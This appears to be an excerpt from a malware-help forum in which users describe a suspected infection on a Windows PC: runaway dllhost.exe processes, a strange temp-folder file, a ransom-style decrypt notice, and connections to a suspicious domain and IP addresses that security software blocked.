00040328 _____ (McAfee, Inc.) C:\Windows\SysWOW64\HIPIS0e011b5.dll 2014-09-06 21:51 - 2010-01-26 17:44 - 00047080 _____ (McAfee, Inc.) 
  12. I have a PC that appears to be infected with something. Whenever using the internet numerous dllhost.exe processes start until CPU usage spikes at 100%. I have tried running virus scans (using Vipre antivirus) and also ran Malwarebytes normally and in safe mode several times, but the issue remains. I have been reading some of the other topics that sound like this issue as well that you've been able to help. I hope you're able to help me as well.
  13. I'm not sure how much to say on here as I don't want to leave myself vulnerable to further attacks. I'm really reporting this to Malwarebytes to stop this problem. I can't find any reference to the Trojan file name or a key in my registry called Etkthion. I can't view the windows/current version/run and I think it's corrupted by this malware. I get dllhosts.exe growing (you can see these in process explorer or task manager) and odd files appearing in my temp folder at the same time. No malware has stopped this though I do so manually, but it recurs. This one did find a Trojan Fake MS folder which made the scan crash but I deleted it myself. It was called idosivabdi.dat. There was also a decrypt instruction to a long strange website which I can't cut and paste. I also get pop up warnings from Malwarebytes that a malicious website is being blocked, domain cd5c5s.com and two outgoing IPs 31.184.192.202/213 and through my dllhost.exe process that lives in the Windows/SysWOW64 folder. I suspect a rootkit and am frustrated by the time wasted. If anyone posts some suggestions, please remember to explain what things are and what I am being asked to do. I am not prepared to allow third party access or post logs etc. here for security reasons, but I hope this information helps stop the website/hackers. Why can't we cut and paste - this has been so laborious when I'd written it all out ready